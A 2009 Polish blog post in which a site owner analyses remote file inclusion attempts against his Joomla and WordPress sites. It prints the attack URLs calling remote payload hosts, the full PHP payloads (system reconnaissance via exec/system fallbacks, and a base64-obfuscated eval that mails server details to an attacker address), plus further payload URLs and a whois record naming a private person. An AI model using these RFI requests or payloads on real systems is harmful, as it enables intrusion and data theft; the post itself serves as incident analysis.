Tag: cracker

haker, cracker, kraker, hacker

07.08.2009 / / 0 Comments

haker, hacker, kraker, cracker

Prawie jak jeden chuj, podobno prawie robi wielką różnice… podobno to takie względne…

nurtujący tytuł… Kolejne ciekawe wirusowe skrypty, lub tylko avast świruje.

//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=

Takim zapytaniem ktoś próbował coś zdziałać:
//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cimagro.com.ar///administrator/components/com_virtuemart/id.txt?
Avast rozpoznaje jako: PHP:Agent-J [Trj] – Koń Trojański – infekuje cache przeglądarki: _CACHE_, _CACHE_001_ itp.

Cały ko źródłowy z pliku id.txt:

<?php
 
//Coracore Response
$pwd1 = @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");
if (empty($id1)) {
	$id1 = @get_current_user();
}
$sof1 = @getenv("SERVER_SOFTWARE");
$php1 = @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1 = @diskfreespace($pwd1);
$all1 = disk_total_space($pwd1);
$used = ConvertBytes($all1 - $free1);
$free = ConvertBytes(@diskfreespace($pwd1));
if (!$free) {
	$free = 0;
}
$all = ConvertBytes(@disk_total_space($pwd1));
if (!$all) {
	$all = 0;
}
if (@is_writable($pwd1)) {
	$perm = "[W]";
} else {
	$perm = "[R]";
}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
	$sf = "ON";
} else {
	$sf = "OFF";
}
 
echo "Coracore" . $sf . "<br>";
echo "uname -a:	$un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software:	$sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";
 
function ConvertBytes($number) {
	$len = strlen($number);
	if ($len < 4) {
		return sprintf("%d b", $number);
	}
	if ($len >= 4 && $len <= 6) {
		return sprintf("%0.2f Kb", $number / 1024);
	}
	if ($len >= 7 && $len <= 9) {
		return sprintf("%0.2f Mb", $number / 1024 / 1024);
	}
	return sprintf("%0.2f Gb", $number / 1024 / 1024 / 1024);
}
 
function ex($cfe) {
	$res = '';
	if (!empty($cfe)) {
		if (function_exists('exec')) {
			@exec($cfe, $res);
			$res = join("\n", $res);
		} elseif (function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
		} elseif (function_exists('system')) {
			@ob_start();
			@system($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif (function_exists('passthru')) {
			@ob_start();
			@passthru($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif (@is_resource($f = @popen($cfe, "r"))) {
			$res = "";
			while (!@feof($f)) {
				$res .= @ fread($f, 1024);
			}
			@pclose($f);
		} else {
			$res = "NULL";
		}
	}
	return $res;
}
?>
<?php
 
$lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXbHNMbU52YlE9PSIpOw0KKCRzYWZlX21vZGUpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRvb2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCggJGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7";
eval(base64_decode($lmge));
exit;
?>

Zawartość zmiennej $lmge po zdekodowaniu (base64_decode) – oczywiście kod jest wykonywany przez eval():

$creator = base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
($safe_mode) ? ($safez = "ON") : ($safez = "OFF_HEHE");
$base = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$name = php_uname();
$ip = getenv("REMOTE_ADDR");
$ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]);
$subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from = "From: " . $writ . "___=" . $safez . "<tool@" . $_SERVER['HTTP_HOST'] . ">";
mail($creator, $subj, $msg, $from);

Zawartość zmiennej $creator po zdekodowaniu (base64_decode):
fr33sh3ll@gmail.com

?_SERVER[DOCUMENT_ROOT]=

Tym razem zapytanie wykorzystywało tablicę super / auto globalną $_SERVER a dokładniej: $_SERVER[DOCUMENT_ROOT] albo tylko mi się tak wydaje. Całe zapytanie:
?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???

Avast rozpoznał jako: PHP:Small-B [Trj], zwartość readme.txt:

<?php
 
echo "Mic22";
$cmd = "id";
$eseguicmd = ex($cmd);
echo $eseguicmd;
 
function ex($cfe) {
	$res = '';
	if (!empty($cfe)) {
		if (function_exists('exec')) {
			@exec($cfe, $res);
			$res = join("\n", $res);
		} elseif (function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
		} elseif (function_exists('system')) {
			@ob_start();
			@system($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif (function_exists('passthru')) {
			@ob_start();
			@passthru($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif (@is_resource($f = @popen($cfe, "r"))) {
			$res = "";
			while (!@feof($f)) {
				$res .= @ fread($f, 1024);
			}
			@pclose($f);
		}
	}
	return $res;
}
 
exit;

index2.php/administrator?mosConfig_absolute_path=

Całe zapytanie:
index2.php/administrator?mosConfig_absolute_path=http://www.inflightservice.se/sas/id.txt??

Avast alarmuje: PHP:Agent-K [Trj], Koń Trojański, – infekuje cache przeglądarki: _CACHE_, _CACHE_001_ itp.

Kod id.txt:

<?
 
echo "klepek_klepek<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "NigeriaN HackerS TeaM<br>";
exit;
?>

O co w tym chodzi…

Sam nie wiem, mogę tylko myśleć lecz nie odczuwam takiej potrzeby. Nigeryjscy hakerzy atakują.
Swoją drogą wszystko wykonane poprzez: libwww-perl/5.79

load_lang.php?_SERWEB[configdir]=

05.08.2009 / / 0 Comments

load_lang.php?_SERWEB[configdir]=

Takim o to zapytaniem ktoś próbował mi zhackować WordPressa a dokładniej:

/load_lang.php?_SERWEB[configdir]=http://for.caucasus.net/nit.txt??

Czyżby to była jakaś dziura w WordPress 2.8.2, spróbuję się dowiedzieć najpierw w rodzimym nieprzydanym języku potem pomęczę się z tłumaczeniem pytania to inglisz…

Wszystko z jednego IP: 67.215.229.226

Oczywiście jak najszybciej zaktualizowałem do 2.8.3, która jest wersją poprawiająca poprawki…

A co się znajdowało pod: http://for.caucasus.net/nit.txt

Otóż ciekawy i długi kod z którego można się wiele nauczyć. Tak pobieżnie: kasuje, robi kopie zapasową, wysyła co popadanie. przypomina to jakiegoś gotowca czy coś podobnego a no i wysyła wszystkie kopie plików na email.

jako że plugin do kolorowania składni wywala błąd 500 serwera to kod jest dostępny tu:
kod nit.txt Georgian hacker Nitrex
load_lang.php Remote File Inclusion Exploit to wiemy do czego skrypt jest

Nasz niedoszły hacker podpisuje się:

< ?
; – This Web Was Hacked And Rooted By Georgian Hacker Nitrex
?>;

Doszukując się dalszych powiązań:

person: Alexander Shakh-Nazarov
phone: +995 32 920000
e-mail: shakh@caucasus.net
nic-hdl: AS2778-RIPE
address: Caucasus Network
address: 42 Rustaveli ave.
address: Tbilisi, Georgia

Whois jednej z powiązanych domen.

I jeszcze trochę domen i skryptów:

http://www.geneseobeadstudio.com/safe.txt
http://www.geneseobeadstudio.com/cmd.txt
http://geocities.com/machinekill/cmd.txt
zhani-kalandadze.ge